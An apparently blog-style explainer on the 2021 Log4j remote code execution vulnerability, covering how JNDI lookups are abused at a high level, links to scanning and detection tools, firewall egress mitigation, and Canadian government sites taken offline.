What is Log4j
Logging is critical in software. Log4j provides a very helpful way. You can configure file based level setting. That means you don’t need to change the source code when you want to change the debugging level.
You can easily switch between the standard levels, ALL < DEBUG < INFO < WARN < ERROR < FATAL < OFF.
Log4j Security Vulnerability
There are reports to confirm that hackers might start exploiting the flaw dates back to November 24, 2021. However, the issue has come to attention of public around mid-December.
If you use Java, you are most probably affected by this threat. It is a large population of enterprise Java software currently available.
Log4j is the most popular Java logging framework. Immediate action to patch the vulnerability is needed.
This is a low skilled attack. Attacker can run an arbitrary code on any vulnerable application. This leads to endless possibilities and risks.
There is strong evidence this vulnerability is being mass scanned on the internet as with historical RCE (remote code execution) attacks. In 2017, It only took less than 2 days to exploit with a similar vulnerability that occurred.
Microsoft said “they have observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems”.
As the threat grows, security experts warn open-source software applications continue to be at risk. Kayla Underkoffler, senior security technologist, HackerOne said “open-source software is behind nearly all modern digital infrastructure, with the average application using 528 different open-source components.”
What Are Hackers Exploiting?
With respect to Nozomi Networks attack analysis, the “new zero-day vulnerability in the Apache Log4j logging utility that has been allowing easy-to-exploit remote code execution (RCE).” By using the vulnerability in the Java logging library, attackers can insert text into log messages which load a code from a remote server.
In addition, attackers can execute a code via calls to JNDI (Java Naming and Directory Interface). Then, attackers can exploit LDAP (Lightweight Directory Access Protocol), DNS (Domain Name Service), RMI (Java’s Remote Interface), and URLs by redirecting to an external server.
However, the nightmare of this threat lays somewhere else. Tim Mackey, principal security strategist, Synopsys Cybersecurity Research said “The real problem with a Log4j attack at this point is that the attackers know patches are available and that most vulnerable systems are being updated as quickly as possible. This means that they can’t afford to carefully craft an attack and are far more likely to install or copy a piece of code that’ll lay dormant on the compromised system. When that dormant code is activated, that’s when we’ll see some of the more sophisticated attacks,”
How to Identify
Linux/Unix/OSX systems: The Fenrir local scanning tool runs as a bash script.
https://github.com/Neo23x0/Fenrir
Windows: You can use the following Powershell script to search for JndiLookup.class in Jar files:
How to Detect
You can use the Python script from the following link to detect if an HTTP server is potentially vulnerable to the log4j 0-day RCE:
https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
Firewall Mitigation
Based on expert analysis, attacks appear to follow a common pattern. Attackers first identify a system is vulnerable by scanning broad network ranges with the JNDI request. After that, they get a vulnerable system to connect to a another server specified by the initial request to download a malicious payload. It has been observed that attackers changes the text to bypass the detection. Hence, it is important to be able to identify variations.
If your firewall is configured such that systems are only allowed to make outbound requests to required servers (such as DNS) and drop all other outbound connections, the server would be protected from responding to the initial request. In other words, this could lead an attacker to believe the initial attack was not successful and move on as well as prevent the server from downloading the malicious payload.
What Happened in Canada
The Public Health Agency (PHAC) of Canada and Statistics Canada websites have been temporarily taken offline. Some systems are working partially. Government stated that abundance of measures have been taken.
For more info: Canadian Centre for Cyber Security